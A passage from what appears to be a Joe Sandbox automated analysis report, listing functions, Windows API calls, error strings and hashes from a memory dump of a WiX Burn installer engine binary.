                                                                                                                                                                  • Failed to enumerate the dependents key of "%ls"., xrefs: 009752FF
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Close$lstrlen
                                                                                                                                                                  • String ID: Failed to add the dependent key "%ls" to the string array.$Failed to allocate the registry key for dependency "%ls".$Failed to check the dictionary of ignored dependents.$Failed to enumerate the dependents key of "%ls".$Failed to get the name of the dependent from the key "%ls".$Failed to open the registry key "%ls". The dependency store is corrupt.$Failed to open the registry key for dependents of "%ls".$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\deputil.cpp
                                                                                                                                                                  • API String ID: 1752758355-2900922597
                                                                                                                                                                  • Opcode ID: a852660be84eea0f8d9f11dc67eee121e8c07b298d2fb5f99b35e23d4aad3f8e
                                                                                                                                                                  • Instruction ID: 83c894b7998f566f0c9a37d506c02b10ce0bbc6c9358c81c20a48be355bdd30f
                                                                                                                                                                  • Opcode Fuzzy Hash: a852660be84eea0f8d9f11dc67eee121e8c07b298d2fb5f99b35e23d4aad3f8e
                                                                                                                                                                  • Instruction Fuzzy Hash: 2E51C733E40A29FBEF619A90CC06FEF7A649B44751F538550BA18790E2D3F48E50DAD1
                                                                                                                                                                  Function 0091327C Relevance: 17.7, APIs: 4, Strings: 6, Instructions: 169COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000003,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000003,?,?,0096A94F,?,?), ref: 009132DB
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,0096A94F,?,?,00000000,0000FDE9,?,00917B05,00000003), ref: 009132E7
                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000003,00000000,?,?,0096A94F,?,00000000,00000000,00000000,00000000,00000003,?,?,0096A94F,?,?), ref: 009133E6
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,0096A94F,?,?,00000000,0000FDE9,?,00917B05,00000003), ref: 009133F0
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ByteCharErrorLastMultiWide
                                                                                                                                                                  • String ID: Not enough memory to allocate string of size: %u$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\strutil.cpp$failed to allocate string, len: %u$failed to convert to ansi: %ls$failed to get required size for conversion to ANSI: %ls$failed to get size of destination string
                                                                                                                                                                  • API String ID: 203985260-2965928106
                                                                                                                                                                  • Opcode ID: 4ef9faeb27ea7fa0289577f1afd465092da41003e40c49b13286b7fa2cde4cf6
                                                                                                                                                                  • Instruction ID: 7dccba4a4905fade39905072069b8c380bf21c262e7f01b6dcf06fb687085f35
                                                                                                                                                                  • Opcode Fuzzy Hash: 4ef9faeb27ea7fa0289577f1afd465092da41003e40c49b13286b7fa2cde4cf6
                                                                                                                                                                  • Instruction Fuzzy Hash: 1B51393274021DBBE7215B14CC4AFFF367CDB48764F418669B925AB1D0EAB09E808660
                                                                                                                                                                  Function 00975753 Relevance: 17.7, APIs: 2, Strings: 8, Instructions: 167registryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00974F04: lstrlenW.KERNEL32(00917162,00916DEA,?,?,?,00975488,00917162,00916DEA,00916EC2,00916DEA,00916DEA,?,?,?,00930D28,0D8C6817), ref: 00974F2A
                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000001,00000000,00000001,00000000,00916DA2,00916CF2,00020006,00000000,00000000,00000000,00000001,00000000,00916DA2,009331C1,00000000,00000000), ref: 009758FE
                                                                                                                                                                  • RegCloseKey.ADVAPI32(00916DA2,00000000,00000001,00000000,00916DA2,00916CF2,00020006,00000000,00000000,00000000,00000001,00000000,00916DA2,009331C1,00000000,00000000), ref: 0097591C
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to create the dependency subkey "%ls"., xrefs: 00975833
                                                                                                                                                                  • Failed to create the dependency registry key "%ls"., xrefs: 009757C8
                                                                                                                                                                  • Failed to allocate dependent subkey "%ls" under dependency "%ls"., xrefs: 009757FF
                                                                                                                                                                  • Failed to set the %ls registry value to %d., xrefs: 009758D9
                                                                                                                                                                  • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\deputil.cpp, xrefs: 00975790, 00975842, 009758E8
                                                                                                                                                                  • Failed to allocate the registry key for dependency "%ls"., xrefs: 00975781
                                                                                                                                                                  • Failed to set the %ls registry value to "%ls"., xrefs: 00975874, 009758A5
                                                                                                                                                                  • %ls\%ls, xrefs: 009757E5
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Close$lstrlen
                                                                                                                                                                  • String ID: %ls\%ls$Failed to allocate dependent subkey "%ls" under dependency "%ls".$Failed to allocate the registry key for dependency "%ls".$Failed to create the dependency registry key "%ls".$Failed to create the dependency subkey "%ls".$Failed to set the %ls registry value to "%ls".$Failed to set the %ls registry value to %d.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\deputil.cpp
                                                                                                                                                                  • API String ID: 1752758355-602586573
                                                                                                                                                                  • Opcode ID: c611e4760ff170ce12cc47974d54c53bc54bb2f1702ea6dc821bbadb7305b496
                                                                                                                                                                  • Instruction ID: b2aff98dc4aa3de18cff5e6f51f447b3d55c36c00f1b7bdbdba00538aee2a07a
                                                                                                                                                                  • Opcode Fuzzy Hash: c611e4760ff170ce12cc47974d54c53bc54bb2f1702ea6dc821bbadb7305b496
                                                                                                                                                                  • Instruction Fuzzy Hash: E5519372E40619FBEF226F948C46FDF7F79EF45750F028125BA04791A1D3B18A10AB91
                                                                                                                                                                  Function 0096D815 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 159stringregistryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • lstrlenW.KERNEL32(00000000,00000001,BundleUpgradeCode,00000000,00916DA2,00000000,00000000,00000001,0093303D,?,878D30FF,00932F8D,00000000,00933085,67E85650,00916CF2), ref: 0096D849
                                                                                                                                                                  • lstrlenW.KERNEL32(?,0093303D,00000001,00000000,0093303D,00000001,BundleUpgradeCode,00000000), ref: 0096D8D2
                                                                                                                                                                  • RegSetValueExW.ADVAPI32(?,878D30FF,00932F8D,00000000,00933085,67E85650,00916CF2,0093303D,00000001,00932F8D), ref: 0096D95B
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to get total string size in bytes, xrefs: 0096D914
                                                                                                                                                                  • Failed to set registry value to array of strings (first string of which is): %ls, xrefs: 0096D98B
                                                                                                                                                                  • DWORD Overflow while adding length of string to write REG_MULTI_SZ, xrefs: 0096D887
                                                                                                                                                                  • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\regutil.cpp, xrefs: 0096D896, 0096D937, 0096D97F, 0096D984, 0096D99A
                                                                                                                                                                  • failed to copy string: %ls, xrefs: 0096D928
                                                                                                                                                                  • Failed to allocate space for string while writing REG_MULTI_SZ, xrefs: 0096D876
                                                                                                                                                                  • BundleUpgradeCode, xrefs: 0096D82A
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: lstrlen$Value
                                                                                                                                                                  • String ID: BundleUpgradeCode$DWORD Overflow while adding length of string to write REG_MULTI_SZ$Failed to allocate space for string while writing REG_MULTI_SZ$Failed to get total string size in bytes$Failed to set registry value to array of strings (first string of which is): %ls$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\regutil.cpp$failed to copy string: %ls
                                                                                                                                                                  • API String ID: 198323757-1095722736
                                                                                                                                                                  • Opcode ID: 7b5cca9e94de6a9472e5f8891ec44b97777ef0347fe6318c9c573e03ee30f37a
                                                                                                                                                                  • Instruction ID: f3776bb7073731c8355d7564c6c5dbfdd8627719522bec196b5b28a3156a1605
                                                                                                                                                                  • Opcode Fuzzy Hash: 7b5cca9e94de6a9472e5f8891ec44b97777ef0347fe6318c9c573e03ee30f37a
                                                                                                                                                                  • Instruction Fuzzy Hash: BE41E571F41309BBEB11DF58CC4AFAF3678EBC5B44F110069FA25AB280D6709E018BA0
                                                                                                                                                                  Function 0092B35D Relevance: 17.6, APIs: 2, Strings: 8, Instructions: 146COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetCurrentProcessId.KERNEL32(?,8000FFFF,?,?,00000000,?,?), ref: 0092B371
                                                                                                                                                                    • Part of subcall function 009734CC: ReadFile.KERNEL32(00000004,00000004,?,?,00000000,?,00000000,00000000,?,?,0092C427,?,?,00000004,?,00000004), ref: 009734F1
                                                                                                                                                                    • Part of subcall function 009734CC: GetLastError.KERNEL32(?,?,0092C427,?,?,00000004,?,00000004,00000004,?,?,00000004,?,00000004,00000004), ref: 009734FB
                                                                                                                                                                  Strings
                                                                                                                                                                  • d:\a\wix4\wix4\src\burn\engine\pipe.cpp, xrefs: 0092B3B7, 0092B3C2, 0092B3DC, 0092B432, 0092B43D, 0092B4B1, 0092B4DF, 0092B4EA
                                                                                                                                                                  • Verification secret from parent is too big., xrefs: 0092B3CA
                                                                                                                                                                  • Failed to read size of verification secret from parent pipe., xrefs: 0092B38F
                                                                                                                                                                  • Verification secret from parent does not match., xrefs: 0092B445
                                                                                                                                                                  • Failed to allocate buffer for verification secret., xrefs: 0092B3F3
                                                                                                                                                                  • Failed to read verification process id from parent pipe., xrefs: 0092B46B
                                                                                                                                                                  • Failed to inform parent process that child is running., xrefs: 0092B49F
                                                                                                                                                                  • Verification process id from parent does not match., xrefs: 0092B4F2
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CurrentErrorFileLastProcessRead
                                                                                                                                                                  • String ID: Failed to allocate buffer for verification secret.$Failed to inform parent process that child is running.$Failed to read size of verification secret from parent pipe.$Failed to read verification process id from parent pipe.$Verification process id from parent does not match.$Verification secret from parent does not match.$Verification secret from parent is too big.$d:\a\wix4\wix4\src\burn\engine\pipe.cpp
                                                                                                                                                                  • API String ID: 2959708427-3721239626
                                                                                                                                                                  • Opcode ID: 2c98a4eb6a7c6cc4cf17ecffd00c07cdf43774a1b737d0406ee22f3957d9d082
                                                                                                                                                                  • Instruction ID: 414bd722ff472d402f7d6f1ceef0ed95718649399295c9bc2fcc96398549075d
                                                                                                                                                                  • Opcode Fuzzy Hash: 2c98a4eb6a7c6cc4cf17ecffd00c07cdf43774a1b737d0406ee22f3957d9d082
                                                                                                                                                                  • Instruction Fuzzy Hash: EE412A31B80329B7E722B6549C86FBF7BACDB84B10F104116F714BA2D2D3B49D409791
                                                                                                                                                                  Function 00915A09 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 143COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000040,?,00000040,00000000,00000000,0100147D,?,?,?,009141A9,?,?,?,00000000), ref: 00915A5C
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,009141A9,?,?,?,00000000), ref: 00915A68
                                                                                                                                                                  • ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,009141A9,?,?,?,00000000), ref: 00915B05
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,009141A9,?,?,?,00000000), ref: 00915B11
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: EnvironmentErrorExpandLastStrings
                                                                                                                                                                  • String ID: Failed to allocate buffer for expanded string.$Failed to allocate space for expanded path.$Failed to expand environment variables in string: %ls$Failed to get max length of input buffer.$Failed to re-allocate more space for expanded path.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\envutil.cpp
                                                                                                                                                                  • API String ID: 4064601616-3610958334
                                                                                                                                                                  • Opcode ID: e7277b92040f45a556e01d863f71bd78671060a28862b1154ead2f09a8ca998d
                                                                                                                                                                  • Instruction ID: 2212507b9b46e41af520bba5f30ec89ce2bd19521274b7e61962b7d519de2906
                                                                                                                                                                  • Opcode Fuzzy Hash: e7277b92040f45a556e01d863f71bd78671060a28862b1154ead2f09a8ca998d
                                                                                                                                                                  • Instruction Fuzzy Hash: A441C632BC1A29B7D73256448C4AFDF3E689FC1BA4F134155BA147E2D0E6B48980D6E0
                                                                                                                                                                  Function 009701DE Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 137memoryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • VariantInit.OLEAUT32(?), ref: 009701F5
                                                                                                                                                                  • SysAllocString.OLEAUT32(?), ref: 0097022F
                                                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 00970340
                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 0097034B
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: StringVariant$AllocClearFreeInit
                                                                                                                                                                  • String ID: Failed getNamedItem in XmlGetAttribute(%ls)$Failed get_attributes.$Failed get_nodeValue in XmlGetAttribute(%ls)$Failed to allocate attribute name BSTR.$Failed to copy attribute value.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\xmlutil.cpp
                                                                                                                                                                  • API String ID: 760788290-2059256487
                                                                                                                                                                  • Opcode ID: 5375cb775b80ee209ff35f6c4cf556486e8f9162403da6ba3e6e45c6266c4e5e
                                                                                                                                                                  • Instruction ID: 3ae9a9e56a41e5ce97a5ab0ed41ce921a411104c5100430156b789ae172894ac
                                                                                                                                                                  • Opcode Fuzzy Hash: 5375cb775b80ee209ff35f6c4cf556486e8f9162403da6ba3e6e45c6266c4e5e
                                                                                                                                                                  • Instruction Fuzzy Hash: 8B41D377740319FBDB119B50CC4EF6E3B79ABC9B15F158058FA09BB291DAB09A40CB90
                                                                                                                                                                  Function 0096FCA8 Relevance: 17.6, APIs: 3, Strings: 7, Instructions: 129COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 0096FDA6
                                                                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 0096FDE3
                                                                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 0096FDF4
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to query IXMLDOMParseError.reason., xrefs: 0096FD8A
                                                                                                                                                                  • Failed to query IXMLDOMParseError.filepos., xrefs: 0096FD0C
                                                                                                                                                                  • Failed to query IXMLDOMParseError.line., xrefs: 0096FD35
                                                                                                                                                                  • Failed to query IXMLDOMParseError.linepos., xrefs: 0096FD5E
                                                                                                                                                                  • Failed to query IXMLDOMParseError.srcText ., xrefs: 0096FDC7
                                                                                                                                                                  • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\xmlutil.cpp, xrefs: 0096FCE2
                                                                                                                                                                  • Failed to query IXMLDOMParseError.errorCode., xrefs: 0096FCD3
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FreeString
                                                                                                                                                                  • String ID: Failed to query IXMLDOMParseError.errorCode.$Failed to query IXMLDOMParseError.filepos.$Failed to query IXMLDOMParseError.line.$Failed to query IXMLDOMParseError.linepos.$Failed to query IXMLDOMParseError.reason.$Failed to query IXMLDOMParseError.srcText .$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\xmlutil.cpp
                                                                                                                                                                  • API String ID: 3341692771-2297621156
                                                                                                                                                                  • Opcode ID: 8a0a4973ab82af1f069894c36cd63d2d21f1f83243241f22b38ad7e13599824c
                                                                                                                                                                  • Instruction ID: 6f7ab7515b6e1f612b8549a15b9344cd8d3dadbd9ec4b9c1f85ee938d759b53c
                                                                                                                                                                  • Opcode Fuzzy Hash: 8a0a4973ab82af1f069894c36cd63d2d21f1f83243241f22b38ad7e13599824c
                                                                                                                                                                  • Instruction Fuzzy Hash: 68417F71A4121AFBEB048B50DD26FAEBB78EF54B45F1140AAB901B71D0EBB06E409A50
                                                                                                                                                                  Function 009190A0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 121timeCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetSystemTime.KERNEL32(?), ref: 009190C8
                                                                                                                                                                  • GetDateFormatW.KERNEL32(00000400,00000001,?,00000000,00000000,00000000), ref: 009190DC
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 009190E8
                                                                                                                                                                  • GetDateFormatW.KERNEL32(00000400,00000001,?,00000000,?,00000000,?,00000000), ref: 0091915C
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00919166
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: DateErrorFormatLast$SystemTime
                                                                                                                                                                  • String ID: Failed to allocate the buffer for the Date.$Failed to get the Date.$Failed to get the required buffer length for the Date.$Failed to set variant value.$d:\a\wix4\wix4\src\burn\engine\variable.cpp
                                                                                                                                                                  • API String ID: 2700948981-1940114245
                                                                                                                                                                  • Opcode ID: 861b385bf9a4cff250dc5e7da1ec30fd1e35bd38ad27c2b1f638e3ef70c8cdc9
                                                                                                                                                                  • Instruction ID: 506afd8e2fdc336aad481fe2ee1a97a7fd2cfb58015b2760079760a1786d9ecd
                                                                                                                                                                  • Opcode Fuzzy Hash: 861b385bf9a4cff250dc5e7da1ec30fd1e35bd38ad27c2b1f638e3ef70c8cdc9
                                                                                                                                                                  • Instruction Fuzzy Hash: EB31E932B8422E76E72166548C4AFEF7A6C9F49B50F110115FF45FB2C1D6609CC182E1
                                                                                                                                                                  Function 0092E1C1 Relevance: 17.6, APIs: 3, Strings: 7, Instructions: 117fileCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • CreateFileW.KERNEL32(?,80000000,00000005,00000000,00000003,08000000,00000000), ref: 0092E1DE
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0092E1EE
                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 0092E305
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseCreateErrorFileHandleLast
                                                                                                                                                                  • String ID: %ls container from working path '%ls' to path '%ls'$Container has no verification information: %ls$Copying$Failed to open container in working path: %ls$Failed to verify container hash: %ls$Moving$d:\a\wix4\wix4\src\burn\engine\cache.cpp
                                                                                                                                                                  • API String ID: 2528220319-3503443624
                                                                                                                                                                  • Opcode ID: eb826a4abc6ecfe980ad4e4b220dbcbde74ea7852b0d9bc78b945af0d7085064
                                                                                                                                                                  • Instruction ID: a8ec084e15b5c7b28130c367cf800cf8961136b80ade2111b1488a4b8c333f37
                                                                                                                                                                  • Opcode Fuzzy Hash: eb826a4abc6ecfe980ad4e4b220dbcbde74ea7852b0d9bc78b945af0d7085064
                                                                                                                                                                  • Instruction Fuzzy Hash: AA31D832681224BBEF225E54DC4AFAF3A2DEB49B10F050014FF157A2E5D2B5CC60A7A1
                                                                                                                                                                  Function 00919AE0 Relevance: 17.6, APIs: 3, Strings: 7, Instructions: 109libraryloaderCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetModuleHandleW.KERNEL32(msi,DllGetVersion), ref: 00919B0E
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00919B15
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00919B21
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
